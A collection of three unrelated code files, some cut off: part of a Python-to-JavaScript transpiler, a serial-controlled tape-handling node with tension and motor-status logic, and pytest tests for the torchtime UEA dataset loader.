numeric = (float, int, decimal.Decimal,)
string = (str,)
if type(node.value) in numeric:
return node.value
elif type(node.value) in string:
return f'"{node.value}"'
else:
nameconstmap = {True: "true", False: "false", None: "null"}
return nameconstmap[node.value]
def JoinedStrPrint(node, nodemap):
strval = ''
for n in node.values:
token = generate_code(n)
strval += f'{token}' + '+'
if strval[-1] == '+':
strval = strval[:-1]
return strval
def ReturnPrint(node, nodemap):
return f"return {generate_code(node.value)};"
def FunctionDefPrint(node, nodemap):
name = getattr(node, "name", "")
args = generate_code(node.args)
fn = f"function {name}({args}){{"
if isinstance(node.body, Iterable):
fnbody = "".join([str(generate_code(node)) for node in node.body])
retstr = generate_code(node.returns)
fn += f"{fnbody}{retstr}}}"
else:
fn += f"return {str(generate_code(node.body))}}}"
return fn
def LambdaPrint(node, nodemap):
return FunctionDefPrint(node, nodemap)
def AssignPrint(node, nodemap):
asnstr = "var " if isinstance(node.targets[0], ast.Name) else ""
if len(getattr(node.value, "elts", [])) == len(getattr(node.targets[0], "elts", [None])):
for i in range(len(node.value.elts)):
target, val = generate_code(node.targets[0].elts[i]), generate_code(node.value.elts[i])
if (i + 1) == len(node.value.elts):
asnstr += f"{target}={val};"
else:
asnstr += f"{target}={val},"
else:
isiter = False
for n in node.targets:
if isinstance(n, ast.List) or isinstance(n, ast.Tuple):
isiter = True
break
if not isiter:
target, val = generate_code(node.targets[0]), generate_code(node.value)
asnstr += f"{target}={val};"
else:
raise SyntaxError("Unpacking is not currently supported")
if asnstr.find("this") > -1:
asnstr = asnstr.replace("var", "")
return asnstr
def AugAssignPrint(node, nodemap):
target, op, value = generate_code(node.target), generate_code(node.op), generate_code(node.value)
if isinstance(node.op, ast.Pow):
return f"{target} = Math.pow({target}, {value});"
elif isinstance(node.op, ast.FloorDiv):
return f"{target} = Math.floor(({target}{op}{value}));"
else:
return f"{target}{op}={value};"
def RaisePrint(node, nodemap):
throwstr = "throw "
if node.exc:
exc = generate_code(node.exc)
throwstr += f"{exc};"
else:
throwstr += "_;"
return throwstr
def AssertPrint(node, nodemap):
# allows client to make assertions without effecting js
return ""
def PassPrint(node, nodemap):
# allows client to make passes without effecting js
return ""
def BreakPrint(node, nodemap):
return "break;"
def ContinuePrint(node, nodemap):
return "continue;"
def IfPrint(node, nodemap):
cmptest = generate_code(node.test)
ifstr = f"if({cmptest}){{"
ifbody = "".join([str(generate_code(node)) for node in node.body])
ifstr = f"{ifstr}{ifbody}}}"
if isinstance(node.orelse[0], ast.If): # If nodes for orelse = elif
elifstr = "".join([str(IfPrint(node, nodemap)) for node in node.orelse])
ifstr = f"{ifstr}else {elifstr}"
else: # else body of nodes
elsebody = "".join([str(generate_code(node)) for node in node.orelse])
ifstr = f"{ifstr}else{{{elsebody}}}"
return ifstr
def WhilePrint(node, nodemap):
cmptest = generate_code(node.test)
whilebody = "".join([generate_code(node) for node in node.body])
return f"while({cmptest}){{{whilebody}}}"
def ForPrint(node, nodemap):
iter_ = generate_code(node.iter)
range_, enum_ = None, None
if iter_.find("range(") > -1:
range_ = eval(iter_[:-1])
target = generate_code(node.target)
if range_:
forstr = f"for(var {target}={range_.start};{target}<{range_.stop};{target}+={range_.step}){{"
else:
forstr = f"for(var {target} in {iter_}){{{target} = {iter_}[{target}];"
forbody = "".join([str(generate_code(node)) for node in node.body])
forstr += f"{forbody}}}"
return forstr
def withitemPrint(node, nodemap):
withitemstr = ""
name, alias = generate_code(node.context_expr), None
if node.optional_vars:
alias = generate_code(node.optional_vars)
withitemstr = f"var {alias} = {name}"
withitemstr = f"{withitemstr}{alias or name}.__enter__();"
return withitemstr
def WithPrint(node, nodemap):
def withitemAlias(node):
name = None
if node.optional_vars:
name = generate_code(node.optional_vars)
else:
name = generate_code(node.context_expr)
return name
itemaliases = [withitemAlias(node) for node in node.items]
exitmethods = "".join([f"{alias}.__exit__(null, null, null);" for alias in itemaliases])
items = "".join([str(withitemPrint(node, nodemap)) for node in node.items])
withbody = "".join([str(generate_code(node)) for node in node.body])
return f"{items}{withbody}{exitmethods}"
def TryPrint(node, nodemap):
trystr = "try{"
trybody = "".join([str(generate_code(node)) for node in node.body])
trystr += f"{trybody}}}"
if len(node.handlers) > 1:
raise SyntaxError(f"JavaScript only allows for a single handler, you have {len(node.handlers)} handlers")
handler = generate_code(node.handlers[0])
trystr += f"{handler}finally{{"
finalbody = "".join([str(generate_code(node)) for node in node.finalbody])
trystr += f"{finalbody}}}"
return trystr
def ExceptHandlerPrint(node, nodemap):
catchstr = f"catch({node.name or '_'}){{"
catchbody = ""
for n in node.body:
nodestr = generate_code(n)
catchbody += nodestr
catchstr += f"{catchbody}}}"
return catchstr
def argumentsPrint(node, nodemap):
# TODO fix kwargs, add if checks for null arg and put default
args = ','.join([arg.arg for arg in node.args if arg.arg != "self"])
return args
def argPrint(node, nodemap):
return str(node.arg)
def YieldPrint(node, nodemap):
raise SyntaxError("Yield not supported")
def YieldFromPrint(node, nodemap):
raise SyntaxError("YieldFrom not supported")
def NonlocalPrint(node, nodemap):
return ""
def GlobalPrint(node, nodemap):
# add to globals for js module pattern
return ""
def ClassDefPrint(node, nodemap):
bases = [generate_code(base) for base in node.bases]
classdef = {'name': node.name, 'bases': [bases], 'body': {'fns': {}, 'static': {}}}
for propnode in node.body:
if isinstance(propnode, ast.FunctionDef):
name = propnode.name
classdef['body']['fns'][name] = generate_code(propnode)
elif isinstance(propnode, ast.Assign):
name = propnode.targets[0].id
value = generate_code(propnode)
classdef['body']['static'][name] = value[value.index("=") + 1]
else:
raise SyntaxError(f'ClassDef node "{propnode}" not recognized')
classstr = classdef['body']['fns']['__init__'].replace('__init__', classdef["name"])
del classdef["body"]['fns']["__init__"]
for type_ in classdef["body"]:
for k, v in classdef["body"][type_].items():
if type_ == 'fns':
classstr += f"{classdef['name']}.prototype.{k}={v};"
elif type_ == 'static':
classstr += f"{classdef['name']}.{k}={v};"
return classstr
_nodemap = {
type(None): lambda a,b:"",
ast.FunctionDef: FunctionDefPrint,
ast.JoinedStr: JoinedStrPrint,
ast.Constant: ConstantPrint,
ast.FormattedValue: FormattedValuePrint,
ast.Name: NamePrint,
ast.Assign: AssignPrint,
ast.Tuple: TuplePrint,
ast.Dict: DictPrint,
ast.List: ListPrint,
ast.Set: SetPrint,
ast.BoolOp: BoolOpPrint,
ast.Or: OrPrint,
ast.And: AndPrint,
ast.UnaryOp: UnaryOpPrint,
ast.Not: NotPrint,
ast.BinOp: BinOpPrint,
ast.Add: AddPrint,
ast.Sub: SubPrint,
ast.Mult: MultPrint,
ast.Div: DivPrint,
ast.FloorDiv: FloorDivPrint,
ast.Mod: ModPrint,
ast.Pow: PowPrint,
ast.LShift: LShiftPrint,
ast.RShift: RShiftPrint,
ast.BitOr: BitOrPrint,
ast.BitXor: BitXorPrint,
ast.BitAnd: BitAndPrint,
ast.MatMult: MatMultPrint,
ast.Compare: ComparePrint,
ast.Eq: EqPrint,
ast.NotEq: NotEqPrint,
ast.Lt: LtPrint,
ast.LtE: LtEPrint,
ast.Gt: GtPrint,
ast.GtE: GtEPrint,
ast.Is: IsPrint,
ast.IsNot: IsNotPrint,
ast.In: InPrint,
ast.NotIn: NotInPrint,
ast.Call: CallPrint,
ast.keyword: keywordPrint,
ast.Delete: DeletePrint,
ast.IfExp: IfExpPrint,
ast.Attribute: AttributePrint,
ast.Subscript: SubscriptPrint,
ast.Index: IndexPrint,
ast.Slice: SlicePrint,
| |
<gh_stars>1-10
#!/usr/bin/env python
"""
Tape movement procedure:
- tension tape
- start reel moving
- adjust to tension
- move tape
- fine tune movement (adjust tension only when out of range?)
- adjust to tension
- stop reels
- untension
What about back tension?
I think I should pull out the camera to a different node, this will mean:
- pro: no double IO connect/disconnect (arduino + camera)
- pro: simpler nodes
- con: more complex control node
Tape control node
- load/unload tape (independent control of reels, pinch drives, etc...)
- move tape (coordinated movement of tape [most likely in vacuum])
- monitor tension (checking for errors or overtension during movement)
- tension/untension (prepare for movement)
- report slot number (book-keeping requires camera as barcode reader)
- set current slot # and direction (are slot #s going up or down?)
Log everything in case of errors, especially tension!!
- tension
- position (in linear mm)
- all movements
- slot (#)
- slot spacing
Types of movement
- tension/untension reel (feed or pickup)
- feed/pickup pinch drive (feed or pickup)
- advance N mm (combined feed & pickup, pinch & reel)
- advance 1 slot (shortcut to advance N mm)
Failure modes (L6470 has stall detection, try this)
- jam: look for overtension or skipepd steps)
- broken tape look for undertension
- slip clutch failure: look for skipped steps
- pinch drive skipped step: look for skipped steps
TODO maybe rotary encoders are called for...
Config:
- port for arduino (for all movement and sensors
- port for camera (usb address, serial #, etc?)
- acceptable tension
- slot # (will be overridden during movements)
- slot direction
- reel movement parameters [which of these should be in firmware?]
- speed
- accel/decel
- microstepping
- k
"""
import ctypes
import json
import os
import time
import serial
import pizco
import pycomando
from . import base
from .. import config
from ..config.checkers import require
from .. import log
default_config = {
'addr': 'tcp://127.0.0.1:11030',
#'loc': '/dev/ttyACM0',
'loc': 'fake',
#'fakebarcodes': {
# 'filename': '~/.temcagt/fake/barcodes.json',
# 'ppmm': 130.0,
# 'initial': [{'width': 650, 'center': 1055, 'value': 100}, ],
# 'spacing': 780,
# 'top': 655,
# 'bottom': 1455,
# 'barcode_side': 'right', # should match tapecamera
#},
'baud': 115200,
'tension_steps': 1600,
'steps_per_mm': 2075 / 6.,
'mms_per_second': 0.25,
'tension_target': 8495000,
'untensioned_threshold': 8469000, # untensioned if tension < this
# untensioned is 8461749, 8461765
'tension_range': 20000,
'tension_step_size': 100,
'tension_tries': 50,
'reel_speed': 6.,
}
commands = {
0: {
'name': 'error',
'result': (ctypes.c_byte, ),
},
1: {
'name': 'ping',
'args': (ctypes.c_byte, ),
'result': (ctypes.c_byte, ),
},
5: {
'name': 'read_tension',
'args': (ctypes.c_byte, ), # TODO optional
'result': (ctypes.c_int32, ),
},
6: {
'name': 'set_led',
'args': (ctypes.c_byte, ),
},
10: {
'name': 'reset_drives',
},
11: {
'name': 'get_busy',
'args': (ctypes.c_byte, ), # TODO optional
'result': (ctypes.c_byte, ),
},
12: {
'name': 'get_status',
'args': (ctypes.c_byte, ),
'result': (ctypes.c_int16, ),
},
13: {
'name': 'get_position',
'args': (ctypes.c_byte, ),
'result': (ctypes.c_int32, ),
},
14: {
'name': 'set_position',
'args': (ctypes.c_byte, ctypes.c_int32),
},
15: {
'name': 'hold_drive',
'args': (ctypes.c_byte, ),
},
16: {
'name': 'release_drive',
'args': (ctypes.c_byte, ),
},
17: {
'name': 'rotate_drive',
'args': (ctypes.c_byte, ctypes.c_byte, ctypes.c_float),
},
18: {
'name': 'set_speed',
'args': (ctypes.c_byte, ctypes.c_float),
},
19: {
'name': 'get_speed',
'args': (ctypes.c_byte, ),
'result': (ctypes.c_float, ),
},
20: {
'name': 'move_drive',
'args': (ctypes.c_byte, ctypes.c_byte, ctypes.c_uint32),
},
21: {
'name': 'run_reels',
'args': (ctypes.c_float, ),
},
22: {
'name': 'stop_reels',
},
23: {
'name': 'stop_all',
},
24: {
'name': 'release_all',
},
25: {
'name': 'halt_all',
},
30: {
'name': 'step_tape',
'args': (
ctypes.c_byte, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_float,
ctypes.c_byte),
'result': (ctypes.c_int32, ),
},
31: {
'name': 'set_tension_limits',
'args': (ctypes.c_int32, ctypes.c_int32),
},
32: {
'name': 'get_tension_limits',
'result': (ctypes.c_int32, ctypes.c_int32),
},
}
logger = log.get_logger(__name__)
FEED_REEL = 0b00
FEED_PINCH = 0b01
PICKUP_REEL = 0b10
PICKUP_PINCH = 0b11
drives = [FEED_REEL, FEED_PINCH, PICKUP_REEL, PICKUP_PINCH]
COLLECT = 0
DISPENSE = 1
TENSION = 2
UNTENSION = 3
ST_OPTS_RUN_REELS = 0x01
ST_OPTS_WAIT = 0x02
ST_OPTS_WATCH = 0x04
def parse_motor_status(s):
if (s & 0x0020): # B 0x0020
if (s & 0x0040): # A 0x0040
return 'constant speed'
else:
return 'accelerating'
else:
if (s & 0x0040): # A 0x0040
return 'deccelerating'
else:
return 'stopped'
status_bits = {
'HIZ': lambda s: bool(s & 0x0001),
'BUSY': lambda s: bool(~s & 0x0002),
'SW_F': lambda s: 'closed' if (s & 0x0004) else 'open',
'SW_EVN': lambda s: bool(s & 0x0008),
'DIR': lambda s: 'forward' if (s & 0x0010) else 'reverse',
'MOT_STATUS': parse_motor_status,
'NOTPERF_CMD': lambda s: bool(s & 0x0080),
'WRONG_CMD': lambda s: bool(s & 0x0100),
'UVLO': lambda s: bool(~s & 0x0200),
'TH_WRN': lambda s: bool(~s & 0x0400),
'TH_SD': lambda s: bool(~s & 0x0800),
'OCD': lambda s: bool(~s & 0x1000),
'STEP_LOSS_A': lambda s: bool(~s & 0x2000),
'STEP_LOSS_B': lambda s: bool(~s & 0x4000),
'SCK_MOD': lambda s: bool(s & 0x8000),
}
def parse_status(status):
"""
bit name active
15: SCK_MOD 1
14: STEP_LOSS_B 0
13: STEP_LOSS_A 0
12: OCD 0
11: TH_SD 0
10: TH_WRN 0
09: UVLO 0
08: WRONG_CMD 1
07: NOTPERF_CMD 1
06: MOT_STATUS_A X
05: MOT_STATUS_B X
04: DIR X
03: SW_EVN 1
02: SW_F X
01: BUSY 0
00: HIZ 1
MOT_STATUS:
AB
00 stopped
01 accelerating
10 decelerating
11 constant speed
DIR: 0 = reverse, 1 = forward
SW_F: 0 = open, 1 = closed
"""
if isinstance(status, ctypes.c_int16):
status = int(status.value)
s = {}
for n in status_bits:
t = status_bits[n]
s[n] = t(status)
return s
class TapeNodeException(Exception):
pass
class FakeManager(object):
def __init__(self, commands, tension_target, tension_range):
self.commands = commands
self._tension = tension_target
#self._tension = 8461749 # 8461765
htr = tension_range / 2.
self._tension_limits = [self._tension - htr, self._tension + htr]
def on(self, name, func):
pass
def trigger(self, name, *args):
# set_tension_limits
if name == 'set_tension_limits':
self._tension_limits = [args[0], args[1]]
# set_position
# step_tape
def blocking_trigger(self, cmd, *args):
return {
'step_tape': [ctypes.c_int(self._tension), ],
'get_tension_limits': [
ctypes.c_int(v) for v in self._tension_limits],
'read_tension': [ctypes.c_int(self._tension), ],
'get_status': [ctypes.c_int(0), ],
'get_position': [ctypes.c_int(0), ],
'get_speed': [ctypes.c_int(0), ],
}.get(cmd, None)
class TapeNode(base.IONode):
def __init__(self, cfg=None):
base.IONode.__init__(self, cfg)
cfg = self.config()
#
#logger.info("TapeNode[%s] proxying motion %s", self, cfg['motion'])
self.cmd = None
self._state = None
self._barcodes = []
self.new_state = pizco.Signal(nargs=1)
def __del__(self):
# disconnect signals
base.IONode.__del__(self)
def __repr__(self):
cfg = self.config()
return "{}.{} at {} addr {}".format(
self.__module__, self.__class__, hex(id(self)),
cfg.get('addr', ''))
def check_config(self, cfg=None):
if cfg is None:
cfg = self.config()
[require(cfg, k) for k in
[
'loc', 'baud', 'tension_target', 'tension_range',
'tension_steps', 'steps_per_mm', 'mms_per_second',
'tension_step_size',
]]
# TODO finish checking config
def config_delta(self, delta):
logger.info("TapeNode[%s] config_delta %s", self, delta)
if 'tension_target' in delta or 'tension_range' in delta:
self._set_tension_limits()
def connect(self):
if self.cmd is not None:
return
self.check_config()
cfg = self.config()
logger.info(
"TapeNode[%s] creating serial %s, %s",
self, cfg['loc'], cfg['baud'])
# add options for fake tape node
if cfg['loc'] == 'fake':
# make fake cmd and fake mgr
self.cmd = 'fake'
self.mgr = FakeManager(
commands, cfg['tension_target'], cfg['tension_range'])
self._barcodes = cfg.get(
'fakebarcodes', {}).get('initial', [])
# save initial barcodes
self._save_barcodes()
else:
self.serial = serial.Serial(cfg['loc'], cfg['baud'])
self.comando = pycomando.Comando(self.serial)
self.cmd = pycomando.protocols.CommandProtocol(self.comando)
self.comando.register_protocol(1, self.cmd)
self.mgr = pycomando.protocols.command.EventManager(
self.cmd, commands)
time.sleep(4) # wait for the arduino to start
self.mgr.on('error', self._error)
self._set_tension_limits()
#self.guess_state()
logger.info("TapeNode[%s] connected to %s", self, cfg['loc'])
def disconnect(self):
if self.cmd is None:
return
if hasattr(self, 'serial'):
self.serial.close()
del self.serial
for a in ('mgr', 'cmd', 'comando'):
if hasattr(self, a):
delattr(self, a)
self.cmd = None
logger.info("TapeNode[%s] disconnected", self)
def connected(self):
if self.cmd is None:
return False
return True
def _error(self, code):
logger.info("TapeNode[%s] error[%s]", self, code)
raise TapeNodeException(code)
@property
def state(self):
return self._state
@state.setter
def state(self, new_state):
if new_state == self._state:
return
self._state = new_state
self.new_state.emit(self._state)
def get_state(self):
return self.state
def set_state(self, new_state):
self.state = new_state
def guess_state(self):
# only guess if state is None
if self.state is not None:
return self.state
t = self.read_tension(10)
cfg = self.config()
if t < cfg['untensioned_threshold']:
self.state = 'untensioned'
else:
self.state = 'tensioned'
# -- low level --
def trigger(self, cmd, *args):
logger.debug("TapeNode[%s] trigger: %s, %s", self, cmd, args)
if not self.connected():
raise TapeNodeException(
"Failed trigger %s, not connected" % cmd)
self.mgr.trigger(cmd, *args)
def blocking_trigger(self, cmd, *args):
logger.debug("TapeNode[%s] blocking_trigger: %s, %s", self, cmd, args)
if not self.connected():
raise TapeNodeException(
| |
<reponame>philipdarke/torchtime
import re
import pytest
import torch
from torchtime.data import UEA
SEED = 456789
RTOL = 1e-4
ATOL = 1e-4
class TestUEAArrowHead:
def test_invalid_split_arg(self):
"""Catch invalid split argument."""
with pytest.raises(
AssertionError,
match=re.escape("argument 'split' must be one of ['train', 'val']"),
):
UEA(
dataset="ArrowHead",
split="xyz",
train_prop=0.8,
seed=SEED,
)
def test_invalid_split_size(self):
"""Catch invalid split sizes."""
with pytest.raises(
AssertionError,
match=re.escape("argument 'train_prop' must be in range (0, 1)"),
):
UEA(
dataset="ArrowHead",
split="train",
train_prop=-0.5,
seed=SEED,
)
def test_incompatible_split_size(self):
"""Catch incompatible split sizes."""
with pytest.raises(
AssertionError,
match=re.escape("argument 'train_prop' must be in range (0, 1)"),
):
UEA(
dataset="ArrowHead",
split="train",
train_prop=1,
seed=SEED,
)
with pytest.raises(
AssertionError,
match=re.escape("argument 'val_prop' must be in range (0, 1-train_prop)"),
):
UEA(
dataset="ArrowHead",
split="test",
train_prop=0.5,
val_prop=0.5,
seed=SEED,
)
def test_train_val(self):
"""Test training/validation split sizes."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([148, 251, 2])
assert dataset.y_train.shape == torch.Size([148, 3])
assert dataset.length_train.shape == torch.Size([148])
assert dataset.X_val.shape == torch.Size([63, 251, 2])
assert dataset.y_val.shape == torch.Size([63, 3])
assert dataset.length_val.shape == torch.Size([63])
# Ensure no test data is returned
with pytest.raises(
AttributeError, match=re.escape("'UEA' object has no attribute 'X_test'")
):
dataset.X_test
with pytest.raises(
AttributeError, match=re.escape("'UEA' object has no attribute 'y_test'")
):
dataset.y_test
with pytest.raises(
AttributeError,
match=re.escape("'UEA' object has no attribute 'length_test'"),
):
dataset.length_test
def test_train_val_test(self):
"""Test training/validation/test split sizes."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([148, 251, 2])
assert dataset.y_train.shape == torch.Size([148, 3])
assert dataset.length_train.shape == torch.Size([148])
assert dataset.X_val.shape == torch.Size([42, 251, 2])
assert dataset.y_val.shape == torch.Size([42, 3])
assert dataset.length_val.shape == torch.Size([42])
assert dataset.X_test.shape == torch.Size([21, 251, 2])
assert dataset.y_test.shape == torch.Size([21, 3])
assert dataset.length_test.shape == torch.Size([21])
def test_train_split(self):
"""Test training split is returned."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check correct split is returned
assert torch.allclose(dataset.X, dataset.X_train)
assert torch.allclose(dataset.y, dataset.y_train)
assert torch.allclose(dataset.length, dataset.length_train)
def test_val_split(self):
"""Test validation split is returned."""
dataset = UEA(
dataset="ArrowHead",
split="val",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check correct split is returned
assert torch.allclose(dataset.X, dataset.X_val)
assert torch.allclose(dataset.y, dataset.y_val)
assert torch.allclose(dataset.length, dataset.length_val)
def test_test_split(self):
"""Test test split is returned."""
dataset = UEA(
dataset="ArrowHead",
split="test",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check correct split is returned
assert torch.allclose(dataset.X, dataset.X_test)
assert torch.allclose(dataset.y, dataset.y_test)
assert torch.allclose(dataset.length, dataset.length_test)
def test_length(self):
"""Test length attribute."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
seed=SEED,
)
assert torch.all(dataset.length_train == dataset.length_train[0])
assert dataset.X_train.size(1) == dataset.length_train[0]
assert torch.all(dataset.length_val == dataset.length_val[0])
assert dataset.X_val.size(1) == dataset.length_val[0]
assert torch.all(dataset.length_test == dataset.length_test[0])
assert dataset.X_test.size(1) == dataset.length_test[0]
def test_missing(self):
"""Test missing data simulation."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
missing=0.5,
seed=SEED,
)
# Check number of NaNs
assert (
torch.sum(torch.isnan(dataset.X_train)).item() == 18500
) # expect around 148 * 251 * 0.5 = 18,574
assert (
torch.sum(torch.isnan(dataset.X_val)).item() == 5250
) # expect around 42 * 251 * 0.5 = 5,271
assert (
torch.sum(torch.isnan(dataset.X_test)).item() == 2625
) # expect around 21 * 251 * 0.5 = 2,535
def test_invalid_impute(self):
"""Catch invalid impute arguments."""
with pytest.raises(
AssertionError,
match=re.escape(
"argument 'impute' must be a string in dict_keys(['none', 'mean', 'forward']) or a function" # noqa: E501
),
):
UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
missing=0.5,
impute="blah",
seed=SEED,
)
with pytest.raises(
Exception,
match=re.escape(
"argument 'impute' must be a string in dict_keys(['none', 'mean', 'forward']) or a function" # noqa: E501
),
):
UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
missing=0.5,
impute=3,
seed=SEED,
)
def test_no_impute(self):
"""Test no imputation."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
missing=0.5,
impute="none",
seed=SEED,
)
# Check number of NaNs
assert torch.sum(torch.isnan(dataset.X_train)).item() == 18500
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 5250
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 2625
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_mean_impute(self):
"""Test mean imputation."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
missing=0.5,
impute="mean",
seed=SEED,
)
# Check no NaNs post imputation
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_forward_impute(self):
"""Test forward imputation."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
missing=0.5,
impute="forward",
seed=SEED,
)
# Check no NaNs post imputation
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_custom_impute(self):
"""Test custom imputation function."""
def custom_imputer(X, y, fill):
"""Does not impute data i.e. same as impute='none'"""
return X, y
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
missing=0.5,
impute=custom_imputer,
seed=SEED,
)
# Check number of NaNs
assert torch.sum(torch.isnan(dataset.X_train)).item() == 18500
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 5250
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 2625
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_time(self):
"""Test time argument."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
time=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([148, 251, 2])
assert dataset.X_val.shape == torch.Size([42, 251, 2])
assert dataset.X_test.shape == torch.Size([21, 251, 2])
# Check time channel
for i in range(251):
assert torch.equal(
dataset.X_train[:, i, 0],
torch.full([148], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_val[:, i, 0],
torch.full([42], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_test[:, i, 0],
torch.full([21], fill_value=i, dtype=torch.float),
)
def test_no_time(self):
"""Test time argument."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([148, 251, 1])
assert dataset.X_val.shape == torch.Size([42, 251, 1])
assert dataset.X_test.shape == torch.Size([21, 251, 1])
def test_mask(self):
"""Test mask argument."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
mask=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([148, 251, 2])
assert dataset.X_val.shape == torch.Size([42, 251, 2])
assert dataset.X_test.shape == torch.Size([21, 251, 2])
# Check mask channel
assert torch.sum(dataset.X_train[:, :, 1]) == 148 * 251
assert torch.sum(dataset.X_val[:, :, 1]) == 42 * 251
assert torch.sum(dataset.X_test[:, :, 1]) == 21 * 251
def test_delta(self):
"""Test time delta argument."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
delta=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([148, 251, 2])
assert dataset.X_val.shape == torch.Size([42, 251, 2])
assert dataset.X_test.shape == torch.Size([21, 251, 2])
# Check time delta channel
assert torch.equal(
dataset.X_train[:, 0, 1], torch.zeros([148], dtype=torch.float)
)
assert torch.equal(dataset.X_val[:, 0, 1], torch.zeros([42], dtype=torch.float))
assert torch.equal(
dataset.X_test[:, 0, 1], torch.zeros([21], dtype=torch.float)
)
for i in range(1, 251):
assert torch.equal(
dataset.X_train[:, i, 1],
torch.full([148], fill_value=1, dtype=torch.float),
)
assert torch.equal(
dataset.X_val[:, i, 1],
torch.full([42], fill_value=1, dtype=torch.float),
)
assert torch.equal(
dataset.X_test[:, i, 1],
torch.full([21], fill_value=1, dtype=torch.float),
)
def test_time_mask_delta(self):
"""Test combination of time/mask/delta arguments."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
mask=True,
delta=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([148, 251, 4])
assert dataset.X_val.shape == torch.Size([42, 251, 4])
assert dataset.X_test.shape == torch.Size([21, 251, 4])
# Check time channel
for i in range(251):
assert torch.equal(
dataset.X_train[:, i, 0],
torch.full([148], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_val[:, i, 0],
torch.full([42], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_test[:, i, 0],
torch.full([21], fill_value=i, dtype=torch.float),
)
# Check mask channel
assert torch.sum(dataset.X_train[:, :, 2]) == 148 * 251
assert torch.sum(dataset.X_val[:, :, 2]) == 42 * 251
assert torch.sum(dataset.X_test[:, :, 2]) == 21 * 251
# Check time delta channel
assert torch.equal(
dataset.X_train[:, 0, 3], torch.zeros([148], dtype=torch.float)
)
assert torch.equal(dataset.X_val[:, 0, 3], torch.zeros([42], dtype=torch.float))
assert torch.equal(
dataset.X_test[:, 0, 3], torch.zeros([21], dtype=torch.float)
)
for i in range(1, 251):
assert torch.equal(
dataset.X_train[:, i, 3],
torch.full([148], fill_value=1, dtype=torch.float),
)
assert torch.equal(
dataset.X_val[:, i, 3],
torch.full([42], fill_value=1, dtype=torch.float),
)
assert torch.equal(
dataset.X_test[:, i, 3],
torch.full([21], fill_value=1, dtype=torch.float),
)
def test_downscale(self):
"""Test downscale argument."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
downscale=0.1,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([15, 251, 2])
assert dataset.y_train.shape == torch.Size([15, 3])
assert dataset.length_train.shape == torch.Size([15])
assert dataset.X_val.shape == torch.Size([4, 251, 2])
assert dataset.y_val.shape == torch.Size([4, 3])
assert dataset.length_val.shape == torch.Size([4])
assert dataset.X_test.shape == torch.Size([2, 251, 2])
assert dataset.y_test.shape == torch.Size([2, 3])
assert dataset.length_test.shape == torch.Size([2])
def test_reproducibility_1(self):
"""Test seed argument."""
dataset = UEA(
dataset="ArrowHead",
split="train",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check first value in each data set
assert torch.allclose(
dataset.X_train[0, 0, 1], torch.tensor(-1.8515), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
dataset.X_val[0, 0, 1], torch.tensor(-1.9190), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
